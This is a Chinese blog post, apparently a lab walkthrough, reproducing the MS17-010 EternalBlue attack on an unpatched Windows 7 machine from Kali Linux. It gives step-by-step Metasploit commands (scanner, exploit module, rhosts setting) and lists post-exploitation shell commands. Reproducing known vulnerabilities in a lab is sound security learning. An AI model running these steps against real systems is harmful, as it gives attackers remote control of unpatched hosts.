MS17-010(永恒之蓝)复现

复现环境:

  1. 靶机:windows7(IP:192.168.8.145) 存在永恒之蓝的漏洞。
  2. 攻击机:kali-linux(IP:192.168.8.139)。
  3. 实验条件:两台机器之间可以相互ping通,并且windows7机器(无补丁)开启了445端口且防火墙是关闭的。

 复现过程:

1.打开MSF,输入命令:msfconsole打开msf后找msf的脚本,输入命令:search ms17-010 。

   #搜索msf中和ms17-010漏洞有关的脚本

 2.使用ms17-010的辅助性脚本use auxiliary/scanner/smb/smb_ms17_010。  3.配置ms17-010的辅助性脚本。

查看有哪些项需要进行配置:show options                  

 配置要攻击的靶机的ip地址set rhosts 192.168.8.145

 配置完成后,执行ms17-010的辅助性脚本:run #运行模块。

 4.使用ms17-010攻击性模块use exploit/windows/smb/ms17_010_eternalblue。

5.查看配置项:show options。

设置被攻击机器ipset rhosts 192.168.8.145

 运行ms17-010攻击模块run

攻击完成成功建立会话。

6.得到靶机的shell。

7.进入终端可以利用一些常见的命令,得到靶机的信息。

例如:systeminfo#查看靶机信息、ipconfig #查看靶机网络配置、ps #查看靶机正在运行的进程

8.页面如果出现了中文乱码问题,输入:chcp 65001 可解决乱码问题。

以上就完成了对永恒之蓝漏洞的复现操作,希望可以帮助到大家。

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值